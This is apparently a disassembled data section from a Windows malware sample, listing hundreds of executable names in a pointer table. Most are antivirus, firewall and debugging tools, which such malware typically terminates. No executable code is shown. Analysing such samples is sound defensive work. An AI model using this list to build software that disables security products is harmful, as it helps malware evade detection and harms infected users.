align 10h
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .data:0043B5EC�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .data:0043B5F0�o
align 10h
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .data:0043B5F4�o
align 4
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .data:0043B5F8�o
align 10h
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .data:0043B5FC�o
align 4
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .data:0043B600�o
align 4
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .data:0043B604�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .data:0043B608�o
align 10h
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .data:0043B60C�o
align 4
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .data:0043B610�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .data:0043B614�o
align 4
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .data:0043B618�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .data:0043B61C�o
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .data:0043B620�o
align 4
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .data:0043B624�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .data:0043B628�o
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .data:0043B62C�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .data:0043B630�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .data:0043B634�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .data:0043B638�o
align 4
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .data:0043B63C�o
align 10h
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .data:0043B640�o
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .data:0043B644�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .data:0043B648�o
align 4
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .data:0043B64C�o
align 10h
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .data:0043B650�o
align 4
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .data:0043B654�o
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .data:0043B658�o
align 4
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .data:0043B65C�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .data:0043B660�o
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .data:0043B664�o
align 10h
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .data:0043B668�o
align 10h
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .data:0043B66C�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .data:0043B670�o
align 4
aIcsupp95_exe_0 db 'ICSUPP95.EXE',0 ; DATA XREF: .data:0043B674�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .data:0043B678�o
align 4
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .data:0043B67C�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .data:0043B680�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .data:0043B684�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .data:0043B688�o
align 4
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .data:0043B68C�o
align 10h
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .data:0043B690�o
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .data:0043B694�o
align 4
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .data:0043B698�o
align 4
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .data:0043B69C�o
align 4
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .data:0043B6A0�o
align 10h
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .data:0043B6A4�o
align 4
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .data:0043B6A8�o
align 4
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .data:0043B6AC�o
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .data:0043B6B0�o
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .data:0043B6B4�o
align 4
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .data:0043B6B8�o
align 4
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .data:0043B6BC�o
align 4
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .data:0043B6C0�o
align 10h
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .data:0043B6C4�o
align 4
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .data:0043B6C8�o
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .data:0043B6CC�o
align 4
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .data:0043B6D0�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .data:0043B6D4�o
align 4
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .data:0043B6D8�o
align 4
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .data:0043B6DC�o
align 4
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .data:0043B6E0�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .data:0043B6E4�o
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .data:0043B6E8�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .data:0043B6EC�o
align 4
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .data:0043B6F0�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .data:0043B6F4�o
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .data:0043B6F8�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .data:0043B6FC�o
align 4
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .data:0043B700�o
align 4
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .data:0043B704�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .data:0043B708�o
align 4
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .data:0043B70C�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .data:0043B710�o
align 10h
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .data:0043B714�o
align 10h
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .data:0043B718�o
align 10h
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .data:0043B71C�o
align 4
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .data:0043B720�o
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .data:0043B724�o
align 4
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .data:0043B728�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .data:0043B72C�o
align 4
aLuall_exe_0 db 'LUALL.EXE',0 ; DATA XREF: .data:0043B730�o
align 10h
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .data:0043B734�o
align 4
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .data:0043B738�o
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .data:0043B73C�o
align 4
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .data:0043B740�o
align 4
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .data:0043B744�o
align 4
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .data:0043B748�o
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .data:0043B74C�o
align 10h
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .data:0043B750�o
align 10h
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .data:0043B754�o
align 4
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .data:0043B758�o
align 4
aMcupdate_exe_0 db 'MCUPDATE.EXE',0 ; DATA XREF: .data:0043B75C�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .data:0043B760�o
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .data:0043B764�o
align 4
aMd_exe db 'MD.EXE',0 ; DATA XREF: .data:0043B768�o
align 10h
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .data:0043B76C�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .data:0043B770�o
align 4
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .data:0043B774�o
align 4
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .data:0043B778�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .data:0043B77C�o
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .data:0043B780�o
align 4
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .data:0043B784�o
align 10h
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .data:0043B788�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .data:0043B78C�o
align 4
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .data:0043B790�o
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .data:0043B794�o
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .data:0043B798�o
align 4
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .data:0043B79C�o
align 4
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .data:0043B7A0�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .data:0043B7A4�o
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .data:0043B7A8�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .data:0043B7AC�o
align 10h
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .data:0043B7B0�o
align 4
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .data:0043B7B4�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .data:0043B7B8�o
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .data:0043B7BC�o
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .data:0043B7C0�o
align 4
aMsconfig_exe db 'MSCONFIG.EXE',0 ; DATA XREF: .data:0043B7C4�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .data:0043B7C8�o
align 4
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .data:0043B7CC�o
align 4
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .data:0043B7D0�o
align 4
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .data:0043B7D4�o
align 4
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .data:0043B7D8�o
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .data:0043B7DC�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .data:0043B7E0�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .data:0043B7E4�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .data:0043B7E8�o
align 4
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .data:0043B7EC�o
align 4
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .data:0043B7F0�o
align 4
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .data:0043B7F4�o
align 10h
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .data:0043B7F8�o
align 10h
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .data:0043B7FC�o
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .data:0043B800�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .data:0043B804�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .data:0043B808�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .data:0043B80C�o
align 4
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .data:0043B810�o
align 4
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .data:0043B814�o
align 10h
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .data:0043B818�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .data:0043B81C�o
align 4
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .data:0043B820�o
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .data:0043B824�o
align 10h
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .data:0043B828�o
align 4
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .data:0043B82C�o
align 4
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .data:0043B830�o
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .data:0043B834�o
align 10h
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .data:0043B838�o
align 10h
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .data:0043B83C�o
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .data:0043B840�o
align 10h
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .data:0043B844�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .data:0043B848�o
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .data:0043B84C�o
align 4
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .data:0043B850�o
align 4
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .data:0043B854�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .data:0043B858�o
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .data:0043B85C�o
align 4
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .data:0043B860�o
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .data:0043B864�o
align 10h
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .data:0043B868�o
align 4
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .data:0043B86C�o
align 4
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .data:0043B870�o
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .data:0043B874�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .data:0043B878�o
align 4
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .data:0043B87C�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .data:0043B880�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .data:0043B884�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .data:0043B888�o
align 4
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .data:0043B88C�o
align 4
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .data:0043B890�o
align 4
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .data:0043B894�o
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .data:0043B898�o
align 10h
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .data:0043B89C�o
align 10h
aNt_exe db 'NT.EXE',0 ; DATA XREF: .data:0043B8A0�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .data:0043B8A4�o
align 4
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .data:0043B8A8�o
align 4
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .data:0043B8AC�o
align 4
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .data:0043B8B0�o
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .data:0043B8B4�o
align 4
aNupgrade_exe_0 db 'NUPGRADE.EXE',0 ; DATA XREF: .data:0043B8B8�o
align 4
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .data:0043B8BC�o
align 4
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .data:0043B8C0�o
align 4
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .data:0043B8C4�o
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .data:0043B8C8�o
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .data:0043B8CC�o
align 10h
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .data:0043B8D0�o
align 10h
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .data:0043B8D4�o
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .data:0043B8D8�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .data:0043B8DC�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .data:0043B8E0�o
align 4
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .data:0043B8E4�o
align 4
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .data:0043B8E8�o
aOutpost_exe_0 db 'OUTPOST.EXE',0 ; DATA XREF: .data:0043B8EC�o
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .data:0043B8F0�o
align 10h
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .data:0043B8F4�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .data:0043B8F8�o
align 4
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .data:0043B8FC�o
align 10h
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .data:0043B900�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .data:0043B904�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .data:0043B908�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .data:0043B90C�o
align 4
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .data:0043B910�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .data:0043B914�o
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .data:0043B918�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .data:0043B91C�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .data:0043B920�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .data:0043B924�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .data:0043B928�o
align 4
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .data:0043B92C�o
align 4
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .data:0043B930�o
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .data:0043B934�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .data:0043B938�o
align 4
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .data:0043B93C�o
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .data:0043B940�o
align 4
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .data:0043B944�o
align 4
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .data:0043B948�o
align 4
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .data:0043B94C�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .data:0043B950�o
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .data:0043B954�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .data:0043B958�o
align 4
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .data:0043B95C�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .data:0043B960�o
align 4
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .data:0043B964�o
align 4
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .data:0043B968�o
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .data:0043B96C�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .data:0043B970�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .data:0043B974�o
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .data:0043B978�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .data:0043B97C�o
align 4
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .data:0043B980�o
align 10h
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .data:0043B984�o
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .data:0043B988�o
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .data:0043B98C�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .data:0043B990�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .data:0043B994�o
align 4
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .data:0043B998�o
align 4
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .data:0043B99C�o
align 10h
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .data:0043B9A0�o
align 4
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .data:0043B9A4�o
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .data:0043B9A8�o
align 10h
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .data:0043B9AC�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .data:0043B9B0�o
align 4
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .data:0043B9B4�o
align 4
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .data:0043B9B8�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .data:0043B9BC�o
align 10h
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .data:0043B9C0�o
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .data:0043B9C4�o
align 4
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .data:0043B9C8�o
align 4
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .data:0043B9CC�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .data:0043B9D0�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .data:0043B9D4�o
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .data:0043B9D8�o
align 4
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .data:0043B9DC�o
align 4
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .data:0043B9E0�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .data:0043B9E4�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .data:0043B9E8�o
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .data:0043B9EC�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .data:0043B9F0�o
align 4
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .data:0043B9F4�o
align 4
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .data:0043B9F8�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .data:0043B9FC�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .data:0043BA00�o
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .data:0043BA04�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .data:0043BA08�o
align 4
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .data:0043BA0C�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .data:0043BA10�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .data:0043BA14�o
align 4
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .data:0043BA18�o
align 4
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .data:0043BA1C�o
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .data:0043BA20�o
align 10h
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .data:0043BA24�o
align 4
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .data:0043BA28�o
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .data:0043BA2C�o
align 4
aSc_exe db 'SC.EXE',0 ; DATA XREF: .data:0043BA30�o
align 4
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .data:0043BA34�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .data:0043BA38�o
align 4
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .data:0043BA3C�o
align 10h
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .data:0043BA40�o
align 4
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .data:0043BA44�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .data:0043BA48�o
align 4
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .data:0043BA4C�o
aSd_exe db 'SD.EXE',0 ; DATA XREF: .data:0043BA50�o
align 4
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .data:0043BA54�o
align 4
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .data:0043BA58�o
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .data:0043BA5C�o
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .data:0043BA60�o
align 4
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .data:0043BA64�o
align 10h
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .data:0043BA68�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .data:0043BA6C�o
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .data:0043BA70�o
align 4
aSh_exe db 'SH.EXE',0 ; DATA XREF: .data:0043BA74�o
align 4
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .data:0043BA78�o
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .data:0043BA7C�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .data:0043BA80�o
align 4
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .data:0043BA84�o
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .data:0043BA88�o
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .data:0043BA8C�o
align 4
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .data:0043BA90�o
align 10h
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .data:0043BA94�o
align 4
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .data:0043BA98�o
align 4
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .data:0043BA9C�o
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .data:0043BAA0�o
align 4
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .data:0043BAA4�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .data:0043BAA8�o
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .data:0043BAAC�o
align 4
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .data:0043BAB0�o
align 10h
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .data:0043BAB4�o
align 4
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .data:0043BAB8�o
align 4
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .data:0043BABC�o
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .data:0043BAC0�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .data:0043BAC4�o
align 10h
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .data:0043BAC8�o
aStart_exe db 'START.EXE',0 ; DATA XREF: .data:0043BACC�o
